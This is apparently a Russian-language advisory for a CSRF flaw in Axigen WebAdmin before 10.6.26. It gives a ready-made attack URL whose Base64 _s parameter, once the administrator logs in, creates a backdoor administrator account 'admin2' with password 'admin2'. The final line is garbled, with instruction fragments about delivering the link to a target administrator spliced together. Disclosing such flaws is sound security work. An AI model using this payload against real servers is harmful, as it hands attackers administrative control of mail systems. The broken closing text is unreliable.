
Axigen WebAdmin CSRF Vulnerability
Критически важные действия, изменяющие состояние в интерфейсе Axigen WebAdmin, доступны через GET-запросы. Хотя токен _h защищает от прямых CSRF-атак, приложение обрабатывает поставленные в очередь запросы через параметр _s (breadcrumb) сразу после аутентификации пользователя.
Злоумышленник может создать URL, содержащий полезную нагрузку в кодировке Base64 в параметре _s. Если администратор перейдёт по этой ссылке и завершит процесс входа в систему, поставленное в очередь действие будет автоматически выполнено в его контексте.
Затронутые версии: < 10.6.26
Дополнительную информацию см. в базе знаний Axigen.
Целевой URL:
https://{axigen-domain}:9443/?_h=invalid&_s=eyJwYWdlIjoiYXVzciIsInBhcmFtcyI6eyJhY3Rpb24iOiJhZGQiLCAidXNlcm5hbWVfaW5wdXQiOiJhZG1pbjIiLCAicGFzc3dvcmRfaW5wdXQiOiJhZG1pbjIiLCAiZGlzcGxheV9uYW1lX2lucHV0IjoiYWRtaW4yIn19
Декодированный payload (параметр _s):
{"page":"ausr","params":{"action":"add", "username_input":"admin2", "password_input":"admin2", "display_name_input":"admin2"}}
_s в URL атаки и доставьте его целевому администратору.admin2 (или выполнено ваше собственное действие).